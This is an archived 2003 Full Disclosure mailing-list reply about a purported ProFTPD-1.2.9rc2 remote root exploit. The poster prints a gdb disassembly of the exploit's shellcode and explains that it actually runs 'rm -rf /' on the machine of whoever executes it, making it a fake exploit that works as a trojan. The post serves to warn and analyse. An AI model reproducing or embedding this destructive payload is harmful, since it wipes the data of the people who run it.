Full Disclosure mailing list archives

Re: ProFTPD-1.2.9rc2 remote root exploit

From: Simon Kirby <sim () netnation com>
Date: Fri, 24 Oct 2003 08:27:58 -0700

On Fri, Oct 24, 2003 at 03:36:17PM +0200, Andreas Gietl wrote:

On Friday 24 October 2003 14:22, Jean-Kevin Grosnakeur wrote:

this seems to delete sth on the local harddisk. anybody else seeing this 
effect?


(gdb) disassemble &sc
Dump of assembler code for function sc:
0x0804a1a0 <sc+0>:      xor    %eax,%eax
0x0804a1a2 <sc+2>:      push   %eax
0x0804a1a3 <sc+3>:      push   $0x582f2066
0x0804a1a8 <sc+8>:      push   $0x722d206d
0x0804a1ad <sc+13>:     push   $0x7258632d
0x0804a1b2 <sc+18>:     push   $0x41414141
0x0804a1b7 <sc+23>:     push   $0x41414141
0x0804a1bc <sc+28>:     push   $0x41414141
0x0804a1c1 <sc+33>:     push   $0x41414141
0x0804a1c6 <sc+38>:     push   $0x4368732f
0x0804a1cb <sc+43>:     push   $0x6e69622f
0x0804a1d0 <sc+48>:     xor    %eax,%eax
0x0804a1d2 <sc+50>:     mov    %al,0x7(%esp,1)
0x0804a1d6 <sc+54>:     mov    %al,0x1a(%esp,1)
0x0804a1da <sc+58>:     mov    %al,0x23(%esp,1)
0x0804a1de <sc+62>:     mov    %esp,0x8(%esp,1)
0x0804a1e2 <sc+66>:     xor    %ebx,%ebx
0x0804a1e4 <sc+68>:     lea    0x18(%esp,1),%ebx
0x0804a1e8 <sc+72>:     mov    %ebx,0xc(%esp,1)
0x0804a1ec <sc+76>:     xor    %ebx,%ebx
0x0804a1ee <sc+78>:     lea    0x1b(%esp,1),%ebx
0x0804a1f2 <sc+82>:     mov    %ebx,0x10(%esp,1)
0x0804a1f6 <sc+86>:     mov    %eax,0x14(%esp,1)
0x0804a1fa <sc+90>:     xor    %ebx,%ebx
0x0804a1fc <sc+92>:     mov    %esp,%ebx
0x0804a1fe <sc+94>:     lea    0x8(%esp,1),%ecx
0x0804a202 <sc+98>:     xor    %edx,%edx
0x0804a204 <sc+100>:    lea    0x14(%esp,1),%edx
0x0804a208 <sc+104>:    mov    $0xb,%al
0x0804a20a <sc+106>:    int    $0x80
0x0804a20c <sc+108>:    xor    %ebx,%ebx
0x0804a20e <sc+110>:    xor    %eax,%eax
0x0804a210 <sc+112>:    inc    %eax
0x0804a211 <sc+113>:    int    $0x80
0x0804a213 <sc+115>:    add    %al,(%eax)
End of assembler dump.

Demangles "rm -rf /" and execs it?

Simon-

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

ProFTPD-1.2.9rc2 remote root exploit Jean-Kevin Grosnakeur (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Valdis . Kletnieks (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Andreas Gietl (Oct 24)
  - Re: ProFTPD-1.2.9rc2 remote root exploit Robert Jaroszuk (Oct 24)
    - Re: ProFTPD-1.2.9rc2 remote root exploit Andreas Gietl (Oct 24)
    - Re[2]: ProFTPD-1.2.9rc2 remote root exploit Wine (Oct 24)
    - Re: ProFTPD-1.2.9rc2 remote root exploit Lorenzo Hernandez Garcia-Hierro (Oct 24)
  - Re: ProFTPD-1.2.9rc2 remote root exploit Simon Kirby (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit qobaiashi (Oct 24)
  - Re: ProFTPD-1.2.9rc2 remote root exploit upb (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Jedi/Sector One (Oct 24)
- Re: ProFTPD-1.2.9rc2 localhost delete kang (Oct 24)
  - Re: ProFTPD-1.2.9rc2 localhost delete dilema (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Cael Abal (Oct 24)
  - Re: ProFTPD-1.2.9rc2 remote root exploit Rob Lewis (Oct 24)
- <Possible follow-ups>
- ProFTPD-1.2.9rc2 remote root exploit Jean-Kevin Grosnakeur (Oct 24)
- RE: ProFTPD-1.2.9rc2 remote root exploit GARCIA Lionel (Oct 24)
  - Re: ProFTPD-1.2.9rc2 remote root exploit Philipp Buehler (Oct 24)

(Thread continues...)